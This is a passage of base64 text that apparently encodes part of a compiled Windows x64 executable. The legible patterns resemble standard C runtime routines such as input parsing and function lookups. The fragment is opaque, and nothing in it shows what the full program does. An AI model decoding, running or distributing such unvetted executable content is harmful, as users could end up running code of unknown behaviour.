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9FhPZ+BmZEiQnrA0SICegQh///xwAMAAAA6cH2//9BO/10DEiLVCRoi8/o4FcAAEG/AQAAAOmq9v//6OSG//8z9scADAAAAESL/kWE5HQIZokz6Y32//9AiDPphfb//0E7xXQKSIvWi8jooVcAAEE7/Q+EaPb//0iL1ul1////RYv56V32//9Bg/8BdRfokYb//8cAFgAAAOjWgv//RItsJHDrB4tcJHBEi+szwDhF6HQLSItN4IOhyAAAAP1Bi8VIi41wAQAASDPM6OQTAABIi5wk0AIAAEiBxIACAABBX0FeQV1BXF9eXcPMSIlcJAhXSIPsIEiNHf+hAwBIjT34oQMA6w5IiwNIhcB0Av/QSIPDCEg733LtSItcJDBIg8QgX8NIiVwkCFdIg+wgSI0d16EDAEiNPdChAwDrDkiLA0iFwHQC/9BIg8MISDvfcu1Ii1wkMEiDxCBfw0iJXCQgV0iD7EBIi9n/FbWkAABIi7v4AAAASI1UJFBFM8BIi8//FZWkAABIhcB0MkiDZCQ4AEiLVCRQSI1MJFhIiUwkMEiNTCRgTIvISIlMJCgzyUyLx0iJXCQg/xVWpAAASItcJGhIg8RAX8PMzMxAU1ZXSIPsQEiL2f8VR6QAAEiLs/gAAAAz/0iNVCRgRTPASIvO/xUlpAAASIXAdDlIg2QkOABIi1QkYEiNTCRoSIlMJDBIjUwkcEyLyEiJTCQoM8lMi8ZIiVwkIP8V5qMAAP/Hg/8CfLFIg8RAX15bw8zMzEiLBR1JBABIMwXGAQQAdANI/+BI/yWSowAAzMxIiwUJSQQASDMFqgEEAHQDSP/gSP8lXqMAAMzMSIsF9UgEAEgzBY4BBAB0A0j/4Ej/JVKjAADMzEiLBeFIBABIMwVyAQQAdANI/+BI/yUuowAAzMxIg+woSIsFyUgEAEgzBVIBBAB0B0iDxChI/+D/FSujAAC4AQAAAEiDxCjDzEBTSIPsIIsFzAAEADPbhcB5L0iLBVdJBACJXCQwSDMFFAEEAHQRSI1MJDAz0v/Qg/h6jUMBdAKLw4kFmQAEAIXAD5/Di8NIg8QgW8NAU0iD7CBIjQ1H7QIA/xUJpAAASI0VwrkAAEiLyEiL2P8V/qMAAEiNFb+5AABIi8tIMwW1AAQASIkF/kcEAP8V4KMAAEiNFam5AABIMwWaAAQASIvLSIkF6EcEAP8VwqMAAEiNFZu5AABIMwV8AAQASIvLSIkF0kcEAP8VpKMAAEiNFY25AABIMwVeAAQASIvLSIkFvEcEAP8VhqMAAEiNFY+5AABIMwVAAAQASIvLSIkFpkcEAP8VaKMAAEiNFYG5AABIMwUiAAQASIvLSIkFkEcEAP8VSqMAAEiNFXu5AABIMwUEAAQASIvLSIkFekcEAP8VLKMAAEiNFXW5AABIMwXm/wMA